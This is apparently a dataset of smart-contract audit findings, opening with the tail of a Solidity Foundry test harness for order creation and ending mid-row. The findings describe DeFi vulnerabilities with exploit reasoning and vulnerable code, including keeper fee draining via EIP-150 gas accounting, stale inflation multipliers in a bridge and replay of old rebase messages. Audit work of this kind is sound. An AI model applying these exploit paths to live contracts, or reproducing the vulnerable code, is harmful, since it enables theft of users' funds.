address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.StopLossDecrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createLimitDecreaseOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, uint256 acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.LimitDecrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\nfunction createLimitIncreaseOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice; // used for limit order\\n params.numbers.acceptablePrice = 121000000000000; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.LimitIncrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\n\\nfunction createMarketDecreaseOrder(address account, address marketToken, address collateralToken, uint256 acceptablePrice, uint256 sizeInUsd, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeInUsd; // how much dollar to decrease, will convert into amt of tokens to decrease in long/short based on the execution price\\n params.numbers.initialCollateralDeltaAmount = 13e18; // this is actually useless, will be overidden by real transfer amount\\n // vm.prank(account); \\n // IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = 0;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 10e18; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.MarketDecrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createMarketIncreaseOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = 0;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.MarketIncrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createWithdraw(address withdrawor, uint marketTokenAmount) public returns (bytes32)\\n{\\n address[] memory longTokenSwapPath;\\n address[] memory shortTokenSwapPath;\\n\\n console.log(""createWithdraw with withdrawor: "");\\n console.logAddress(withdrawor);\\n vm.prank(withdrawor); \\n _wnt.transfer(address(_withdrawalVault), 3200); // execution fee\\n\\n vm.prank(withdrawor);\\n ERC20(_marketProps1.marketToken).transfer(address(_withdrawalVault), marketTokenAmount);\\n\\n WithdrawalUtils.CreateWithdrawalParams memory params = WithdrawalUtils.CreateWithdrawalParams(\\n withdrawor, // receiver\\n address(0), // call back function\\n uiFeeReceiver, // uiFeeReceiver\\n _marketProps1.marketToken, // which market token to withdraw\\n longTokenSwapPath,\\n shortTokenSwapPath,\\n 123, // minLongTokenAmount\\n 134, // minShortTokenAmount\\n false, // shouldUnwrapNativeToken\\n 3200, // execution fee\\n 3200 // callback gas limit\\n );\\n\\n vm.prank(withdrawor);\\n bytes32 key = _erouter.createWithdrawal(params);\\n return key;\\n}\\n\\n\\nfunction createDepositNoSwap(Market.Props memory marketProps, address depositor, uint amount, bool isLong) public returns (bytes32){\\n address[] memory longTokenSwapPath;\\n address[] memory shortTokenSwapPath;\\n\\n console.log(""createDeposit with depositor: "");\\n console.logAddress(depositor);\\n\\n vm.prank(depositor);\\n _wnt.transfer(address(_depositVault), 3200); // execution fee\\n if(isLong){\\n console2.log(""000000000000000000"");\\n vm.prank(depositor);\\n IERC20(marketProps.longToken).transfer(address(_depositVault), amount); \\n console2.log(""bbbbbbbbbbbbbbbbbbbbbb"");\\n }\\n else {\\n console2.log(""111111111111111111111111"");\\n console2.log(""deposit balance: %d, %d"", IERC20(marketProps.shortToken).balanceOf(depositor), amount);\\n vm.prank(depositor);\\n IERC20(marketProps.shortToken).transfer(address(_depositVault), amount);\\n console2.log(""qqqqqqqqqqqqqqqqqq"");\\n }\\n \\n\\n DepositUtils.CreateDepositParams memory params = DepositUtils.CreateDepositParams(\\n depositor,\\n address(0),\\n uiFeeReceiver,\\n marketProps.marketToken,\\n marketProps.longToken,\\n marketProps.shortToken,\\n longTokenSwapPath,\\n shortTokenSwapPath,\\n 100000, // minMarketTokens\\n true,\\n 3200, // execution fee\\n 3200 // call back gas limit\\n );\\n\\n console2.log(""aaaaaaaaaaaaaaaaaaaaaaaaa"");\\n vm.prank(depositor);\\n bytes32 key1 = _erouter.createDeposit(params);\\n\\n return key1;\\n}\\n\\n/*\\nfunction testCancelDeposit() public \\n{\\n address[] memory longTokenSwapPath;\\n address[] memory shortTokenSwapPath;\\n\\n address(_wnt).call{value: 100e8}("""");\\n _wnt.transfer(address(_depositVault), 1e6);\\n DepositUtils.CreateDepositParams memory params = DepositUtils.CreateDepositParams(\\n msg.sender,\\n address(0),\\n address(111),\\n _marketProps1.marketToken,\\n _marketProps1.longToken,\\n _marketProps1.shortToken,\\n longTokenSwapPath,\\n shortTokenSwapPath,\\n 100000, // minMarketTokens\\n true,\\n 3200, // execution fee\\n 3200 // call back gas limit\\n );\\n\\n bytes32 key1 = _erouter.createDeposit(params);\\n\\n console.log(""WNT balance of address(222) before cancelllation: %s"", _wnt.balanceOf(address(222)));\\n console.log(""WNT balance of address(this) before cancelllation: %s"", _wnt.balanceOf(address(this))); \\n\\n _roleStore.grantRole(address(222), Role.CONTROLLER); // to save a market's props\\n vm.prank(address(222));\\n _depositHandler.cancelDeposit(key1);\\n console.log(""WNT balance of address(222) after cancelllation: %s"", _wnt.balanceOf(address(222)));\\n console.log(""WNT balance of address(this) after cancelllation: %s"", _wnt.balanceOf(address(this))); \\n}\\n*/\\n\\nfunction testERC165() public{\\n bool yes = _wnt.supportsInterface(type(IWNT).interfaceId);\\n console2.log(""wnt suppports deposit?"");\\n console2.logBool(yes);\\n vm.expectRevert();\\n yes = IERC165(address(_sol)).supportsInterface(type(IWNT).interfaceId);\\n console2.logBool(yes);\\n\\n if(ERC165Checker.supportsERC165(address(_wnt))){\\n console2.log(""_wnt supports ERC165"");\\n }\\n if(ERC165Checker.supportsERC165(address(_sol))){\\n console2.log(""_sol supports ERC165"");\\n }\\n}\\n\\n function justError() external {\\n // revert Unauthorized(""abcdefg""); // 973d02cb\\n // revert(""abcdefg""); // 0x08c379a, Error selector\\n // require(false, ""abcdefg""); // 0x08ce79a, Error selector\\n assert(3 == 4); // Panic: 0x4e487b71\\n }\\n\\n function testErrorMessage() public{\\n\\n try this.justError(){} \\n catch (bytes memory reasonBytes) {\\n (string memory msg, bool ok ) = ErrorUtils.getRevertMessage(reasonBytes);\\n console2.log(""Error Message: ""); console2.logString(msg);\\n console2.log(""error?""); console2.logBool(ok);\\n } \\n }\\n\\n \\n function printAddresses() public{\\n console2.log(""_orderVault:""); console2.logAddress(address(_orderVault));\\n console2.log(""marketToken:""); console2.logAddress(address(_marketProps1.marketToken));\\n } \\n\\n function printPoolsAmounts() public{\\n console2.log(""\\n The summary of pool amounts: "");\\n \\n uint256 amount = MarketUtils.getPoolAmount(_dataStore, _marketProps1, _marketProps1.longToken);\\n console2.log(""Market: _marketProps1, token: long/nwt, amount: %d"", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketProps1, _marketProps1.shortToken);\\n console2.log(""Market: _marketProps1, token: short/USDC, amount: %d"", amount);\\n \\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsAB, _marketPropsAB.longToken);\\n console2.log(""Market: _marketPropsAB, token: long/A, amount: %d"", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsAB, _marketPropsAB.shortToken);\\n console2.log(""Market: _marketPropsAB, token: short/B, amount: %d"", amount);\\n \\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsBC, _marketPropsBC.longToken);\\n console2.log(""Market: _marketPropsBC, token: long/B, amount:%d"", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsBC, _marketPropsBC.shortToken);\\n console2.log(""Market: _marketPropsBC, token: short/C, amount: %d"", amount);\\n \\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsCwnt, _marketPropsCwnt.longToken);\\n console2.log(""Market: _marketPropsCwnt, token: long/C, amount: %d"", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsCwnt, _marketPropsCwnt.shortToken);\\n console2.log(""Market: _marketPropsCwnt, token: short/wnt, amount: %d"", amount);\\n \\n\\n console2.log(""\\n"");\\n }\\n \\n}\\n```\\n" +short side of getReservedUsd does not work for market that has the same collateral token,medium,"short side of getReservedUsd does not work for market that has the same collateral token\\nConsider the case of ETH / USD market with both long and short collateral token as ETH.\\nthe available amount to be reserved (ETH) would CHANGE with the price of ETH.\\n```\\n function getReservedUsd(\\n DataStore dataStore,\\n Market.Props memory market,\\n MarketPrices memory prices,\\n bool isLong\\n ) internal view returns (uint256) {\\n uint256 reservedUsd;\\n if (isLong) {\\n // for longs calculate the reserved USD based on the open interest and current indexTokenPrice\\n // this works well for e.g. an ETH / USD market with long collateral token as WETH\\n // the available amount to be reserved would scale with the price of ETH\\n // this also works for e.g. a SOL / USD market with long collateral token as WETH\\n // if the price of SOL increases more than the price of ETH, additional amounts would be\\n // automatically reserved\\n uint256 openInterestInTokens = getOpenInterestInTokens(dataStore, market, isLong);\\n reservedUsd = openInterestInTokens * prices.indexTokenPrice.max;\\n } else {\\n // for shorts use the open interest as the reserved USD value\\n // this works well for e.g. an ETH / USD market with short collateral token as USDC\\n // the available amount to be reserved would not change with the price of ETH\\n reservedUsd = getOpenInterest(dataStore, market, isLong);\\n }\\n\\n return reservedUsd;\\n }\\n```\\n",Consider apply both long and short calculations of reserveUsd with relation to the indexTokenPrice.,reservedUsd does not work when long and short collateral tokens are the same.,"```\\n function getReservedUsd(\\n DataStore dataStore,\\n Market.Props memory market,\\n MarketPrices memory prices,\\n bool isLong\\n ) internal view returns (uint256) {\\n uint256 reservedUsd;\\n if (isLong) {\\n // for longs calculate the reserved USD based on the open interest and current indexTokenPrice\\n // this works well for e.g. an ETH / USD market with long collateral token as WETH\\n // the available amount to be reserved would scale with the price of ETH\\n // this also works for e.g. a SOL / USD market with long collateral token as WETH\\n // if the price of SOL increases more than the price of ETH, additional amounts would be\\n // automatically reserved\\n uint256 openInterestInTokens = getOpenInterestInTokens(dataStore, market, isLong);\\n reservedUsd = openInterestInTokens * prices.indexTokenPrice.max;\\n } else {\\n // for shorts use the open interest as the reserved USD value\\n // this works well for e.g. an ETH / USD market with short collateral token as USDC\\n // the available amount to be reserved would not change with the price of ETH\\n reservedUsd = getOpenInterest(dataStore, market, isLong);\\n }\\n\\n return reservedUsd;\\n }\\n```\\n" +Keepers can steal additional execution fee from users,medium,"The implementation of `payExecutionFee()` didn't take EIP-150 into consideration, a malicious keeper can exploit it to drain out all execution fee users have paid, regardless of the actual execution cost.\\nThe issue arises on `L55` of `payExecutionFee()`, as it's an `external` function, callingpayExecutionFee() is subject to EIP-150. Only `63/64` gas is passed to the `GasUtils` sub-contract(external library), and the remaing `1/64` gas is reserved in the caller contract which will be refunded to keeper(msg.sender) after the execution of the whole transaction. But calculation of `gasUsed` includes this portion of the cost as well.\\n```\\nFile: contracts\\gas\\GasUtils.sol\\n function payExecutionFee(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n StrictBank bank,\\n uint256 executionFee,\\n uint256 startingGas,\\n address keeper,\\n address user\\n ) external { // @audit external call is subject to EIP// Remove the line below\\n150\\n// Remove the line below\\n uint256 gasUsed = startingGas // Remove the line below\\n gasleft();\\n// Add the line below\\n uint256 gasUsed = startingGas // Remove the line below\\n gasleft() * 64 / 63; // @audit the correct formula\\n uint256 executionFeeForKeeper = adjustGasUsage(dataStore, gasUsed) * tx.gasprice;\\n\\n if (executionFeeForKeeper > executionFee) {\\n executionFeeForKeeper = executionFee;\\n }\\n\\n bank.transferOutNativeToken(\\n keeper,\\n executionFeeForKeeper\\n );\\n\\n emitKeeperExecutionFee(eventEmitter, keeper, executionFeeForKeeper);\\n\\n uint256 refundFeeAmount = executionFee // Remove the line below\\n executionFeeForKeeper;\\n if (refundFeeAmount == 0) {\\n return;\\n }\\n\\n bank.transferOutNativeToken(\\n user,\\n refundFeeAmount\\n );\\n\\n emitExecutionFeeRefund(eventEmitter, user, refundFeeAmount);\\n }\\n```\\n\\nA malicious keeper can exploit this issue to drain out all execution fee, regardless of the actual execution cost. Let's take `executeDeposit()` operation as an example to show how it works:\\n```\\nFile: contracts\\exchange\\DepositHandler.sol\\n function executeDeposit(\\n bytes32 key,\\n OracleUtils.SetPricesParams calldata oracleParams\\n ) external\\n globalNonReentrant\\n onlyOrderKeeper\\n withOraclePrices(oracle, dataStore, eventEmitter, oracleParams)\\n {\\n uint256 startingGas = gasleft();\\n\\n try this._executeDeposit(\\n key,\\n oracleParams,\\n msg.sender\\n ) {\\n } catch (bytes memory reasonBytes) {\\n// rest of code\\n }\\n }\\n\\nFile: contracts\\exchange\\DepositHandler.sol\\n function _executeDeposit(\\n bytes32 key,\\n OracleUtils.SetPricesParams memory oracleParams,\\n address keeper\\n ) external onlySelf {\\n uint256 startingGas = gasleft();\\n// rest of code\\n\\n ExecuteDepositUtils.executeDeposit(params);\\n }\\n\\n\\nFile: contracts\\deposit\\ExecuteDepositUtils.sol\\n function executeDeposit(ExecuteDepositParams memory params) external {\\n// rest of code\\n\\n GasUtils.payExecutionFee(\\n params.dataStore,\\n params.eventEmitter,\\n params.depositVault,\\n deposit.executionFee(),\\n params.startingGas,\\n params.keeper,\\n deposit.account()\\n );\\n }\\n\\nFile: contracts\\gas\\GasUtils.sol\\n function payExecutionFee(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n StrictBank bank,\\n uint256 executionFee,\\n uint256 startingGas,\\n address keeper,\\n address user\\n ) external {\\n uint256 gasUsed = startingGas - gasleft();\\n uint256 executionFeeForKeeper = adjustGasUsage(dataStore, gasUsed) * tx.gasprice;\\n\\n if (executionFeeForKeeper > executionFee) {\\n executionFeeForKeeper = executionFee;\\n }\\n\\n bank.transferOutNativeToken(\\n keeper,\\n executionFeeForKeeper\\n );\\n\\n emitKeeperExecutionFee(eventEmitter, keeper, executionFeeForKeeper);\\n\\n uint256 refundFeeAmount = executionFee - executionFeeForKeeper;\\n if (refundFeeAmount == 0) {\\n return;\\n }\\n\\n bank.transferOutNativeToken(\\n user,\\n refundFeeAmount\\n );\\n\\n emitExecutionFeeRefund(eventEmitter, user, refundFeeAmount);\\n }\\n\\nFile: contracts\\gas\\GasUtils.sol\\n function adjustGasUsage(DataStore dataStore, uint256 gasUsed) internal view returns (uint256) {\\n// rest of code\\n uint256 baseGasLimit = dataStore.getUint(Keys.EXECUTION_GAS_FEE_BASE_AMOUNT);\\n// rest of code\\n uint256 multiplierFactor = dataStore.getUint(Keys.EXECUTION_GAS_FEE_MULTIPLIER_FACTOR);\\n uint256 gasLimit = baseGasLimit + Precision.applyFactor(gasUsed, multiplierFactor);\\n return gasLimit;\\n }\\n```\\n\\nTo simplify the problem, given\\n```\\nEXECUTION_GAS_FEE_BASE_AMOUNT = 0\\nEXECUTION_GAS_FEE_MULTIPLIER_FACTOR = 1\\nexecutionFeeUserHasPaid = 200K Gwei\\ntx.gasprice = 1 Gwei\\nactualUsedGas = 100K\\n```\\n\\n`actualUsedGas` is the gas cost since startingGas(L146 of DepositHandler.sol) but before calling payExecutionFee()(L221 of ExecuteDepositUtils.sol)\\nLet's say, the keeper sets `tx.gaslimit` to make\\n```\\nstartingGas = 164K\\n```\\n\\nThen the calculation of `gasUsed`, L55 of `GasUtils.sol`, would be\\n```\\nuint256 gasUsed = startingGas - gasleft() = 164K - (164K - 100K) * 63 / 64 = 101K\\n```\\n\\nand\\n```\\nexecutionFeeForKeeper = 101K * tx.gasprice = 101K * 1 Gwei = 101K Gwei\\nrefundFeeForUser = 200K - 101K = 99K Gwei\\n```\\n\\nAs setting of `tx.gaslimit` doesn't affect the actual gas cost of the whole transaction, the excess gas will be refunded to `msg.sender`. Now, the keeper increases `tx.gaslimit` to make `startingGas = 6500K`, the calculation of `gasUsed` would be\\n```\\nuint256 gasUsed = startingGas - gasleft() = 6500K - (6500K - 100K) * 63 / 64 = 200K\\n```\\n\\nand\\n```\\nexecutionFeeForKeeper = 200K * tx.gasprice = 200K * 1 Gwei = 200K Gwei\\nrefundFeeForUser = 200K - 200K = 0 Gwei\\n```\\n\\nWe can see the keeper successfully drain out all execution fee, the user gets nothing refunded.","The description in `Vulnerability Detail` section has been simplified. In fact, `gasleft` value should be adjusted after each external call during the whole call stack, not just in `payExecutionFee()`.",Keepers can steal additional execution fee from users.,"```\\nFile: contracts\\gas\\GasUtils.sol\\n function payExecutionFee(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n StrictBank bank,\\n uint256 executionFee,\\n uint256 startingGas,\\n address keeper,\\n address user\\n ) external { // @audit external call is subject to EIP// Remove the line below\\n150\\n// Remove the line below\\n uint256 gasUsed = startingGas // Remove the line below\\n gasleft();\\n// Add the line below\\n uint256 gasUsed = startingGas // Remove the line below\\n gasleft() * 64 / 63; // @audit the correct formula\\n uint256 executionFeeForKeeper = adjustGasUsage(dataStore, gasUsed) * tx.gasprice;\\n\\n if (executionFeeForKeeper > executionFee) {\\n executionFeeForKeeper = executionFee;\\n }\\n\\n bank.transferOutNativeToken(\\n keeper,\\n executionFeeForKeeper\\n );\\n\\n emitKeeperExecutionFee(eventEmitter, keeper, executionFeeForKeeper);\\n\\n uint256 refundFeeAmount = executionFee // Remove the line below\\n executionFeeForKeeper;\\n if (refundFeeAmount == 0) {\\n return;\\n }\\n\\n bank.transferOutNativeToken(\\n user,\\n refundFeeAmount\\n );\\n\\n emitExecutionFeeRefund(eventEmitter, user, refundFeeAmount);\\n }\\n```\\n" +An Oracle Signer can never be removed even if he becomes malicious,medium,"The call flow of removeOracleSIgner incorrectly compares the hash of (""removeOracleSigner"", account) with the hash of (""addOracleSigner"", account) for validating that an action is actually initiated. This validation always fails because the hashes can never match.\\nThe process of removing oracle signers is 2 stage. First function `signalRemoveOracleSigner` is called by the TimelockAdmin which stores a time-delayed timestamp corresponding to the keccak256 hash of (""removeOracleSigner"", account) - a bytes32 value called actionKey in the pendingActions mapping.\\nThen the Admin needs to call function `removeOracleSignerAfterSignal` but this function calls `_addOracleSignerActionKey` instead of `_removeOracleSignerActionKey` for calculating the bytes32 action key value. Now the actionKey is calculated as keccak256 hash of (""addOracleSigner"", account) and this hash is used for checking if this action is actually pending by ensuring its timestamp is not zero inside the `_validateAction` function called via `_validateAndClearAction` function at Line 122. The hash of (""removeOracleSigner"", account) can never match hash of (""addOracleSigner"", account) and thus this validation will fail.\\n```\\n function removeOracleSignerAfterSignal(address account) external onlyTimelockAdmin nonReentrant {\\n bytes32 actionKey = _addOracleSignerActionKey(account);\\n _validateAndClearAction(actionKey, ""removeOracleSigner"");\\n\\n oracleStore.removeSigner(account);\\n\\n EventUtils.EventLogData memory eventData;\\n eventData.addressItems.initItems(1);\\n eventData.addressItems.setItem(0, ""account"", account);\\n eventEmitter.emitEventLog1(\\n ""RemoveOracleSigner"",\\n actionKey,\\n eventData\\n );\\n }\\n```\\n",Replace the call to _addOracleSignerActionKey at Line 118 by call to _removeOracleSignerActionKey,"The process of removing an Oracle Signer will always revert and this breaks an important safety measure if a certain oracle signer becomes malicious the TimelockAdmin could do nothing(these functions are meant for this). Hence, important functionality is permanently broken.","```\\n function removeOracleSignerAfterSignal(address account) external onlyTimelockAdmin nonReentrant {\\n bytes32 actionKey = _addOracleSignerActionKey(account);\\n _validateAndClearAction(actionKey, ""removeOracleSigner"");\\n\\n oracleStore.removeSigner(account);\\n\\n EventUtils.EventLogData memory eventData;\\n eventData.addressItems.initItems(1);\\n eventData.addressItems.setItem(0, ""account"", account);\\n eventEmitter.emitEventLog1(\\n ""RemoveOracleSigner"",\\n actionKey,\\n eventData\\n );\\n }\\n```\\n" +Stale inflationMultiplier in L1ECOBridge,high,"`L1ECOBridge::inflationMultiplier` is updated through `L1ECOBridge::rebase` on Ethereum, and it is used in `_initiateERC20Deposit` and `finalizeERC20Withdrawal` to convert between token amount and `_gonsAmount`. However, if `rebase` is not called in a timely manner, the `inflationMultiplier` value can be stale and inconsistent with the value of L1 ECO token during transfer, leading to incorrect token amounts in deposit and withdraw.\\nThe `inflationMultiplier` value is updated in `rebase` with an independent transaction on L1 as shown below:\\n```\\n function rebase(uint32 _l2Gas) external {\\n inflationMultiplier = IECO(l1Eco).getPastLinearInflation(block.number);\\n```\\n\\nHowever, in both `_initiateERC20Deposit`, `transferFrom` is called before the `inflationMultiplier` is used, which can lead to inconsistent results if `rebase` is not called on time for the `inflationMultiplier` to be updated. The code snippet for `_initiateERC20Deposit` is as follows:\\n```\\n IECO(_l1Token).transferFrom(_from, address(this), _amount);\\n _amount = _amount * inflationMultiplier;\\n```\\n\\n`finalizeERC20Withdrawal` has the same problem.\\n```\\n uint256 _amount = _gonsAmount / inflationMultiplier;\\n bytes memory _ecoTransferMessage = abi.encodeWithSelector(IERC20.transfer.selector,_to,_amount);\\n```\\n\\nThe same problem does not exist in L2ECOBridge. Because the L2 rebase function updates inflationMultiplier and rebase l2Eco token synchronously.\\n```\\n function rebase(uint256 _inflationMultiplier)\\n external\\n virtual\\n onlyFromCrossDomainAccount(l1TokenBridge)\\n validRebaseMultiplier(_inflationMultiplier)\\n {\\n inflationMultiplier = _inflationMultiplier;\\n l2Eco.rebase(_inflationMultiplier);\\n emit RebaseInitiated(_inflationMultiplier);\\n }\\n```\\n",Calling `IECO(l1Eco).getPastLinearInflation(block.number)` instead of using `inflationMultiplier`.,The attacker can steal tokens with this.\\nHe can deposit to L1 bridge when he observes a stale larger value and he will receive more tokens on L2.,```\\n function rebase(uint32 _l2Gas) external {\\n inflationMultiplier = IECO(l1Eco).getPastLinearInflation(block.number);\\n```\\n +Malicious actor cause rebase to an old inflation multiplier,high,"The protocol has a rebasing mechanism that allows to sync the inflation multiplier between both L1 and L2 chains. The call to rebase is permissionless (anyone can trigger it). Insufficant checks allow a malicious actor to rebase to an old value.\\n```\\n function rebase(uint32 _l2Gas) external {\\n inflationMultiplier = IECO(l1Eco).getPastLinearInflation(\\n block.number\\n );\\n\\n bytes memory message = abi.encodeWithSelector(\\n IL2ECOBridge.rebase.selector,\\n inflationMultiplier\\n );\\n\\n sendCrossDomainMessage(l2TokenBridge, _l2Gas, message);\\n }\\n```\\n\\nA malicious actor can call this function a large amount of times to queue messages on `L2CrossDomainMessenger`. Since it is expensive to execute so much messages from `L2CrossDomainMessenger` (especially if the malicious actor sets `_l2Gas` to a high value) there will be a rebase message that will not be relayed through `L2CrossDomainMessenger` (or in failedMessages array).\\nSome time passes and other legitimate rebase transactions get executed.\\nOne day the malicious actor can execute one of his old rebase messages and set the value to the old value. The attacker will debalance the scales between L1 and L2 and can profit from it.","When sending a rebase from L1, include in the message the L1 block number. In L2 rebase, validate that the new rebase block number is above previous block number",debalance the scales between L1 and L2 ECO token,"```\\n function rebase(uint32 _l2Gas) external {\\n inflationMultiplier = 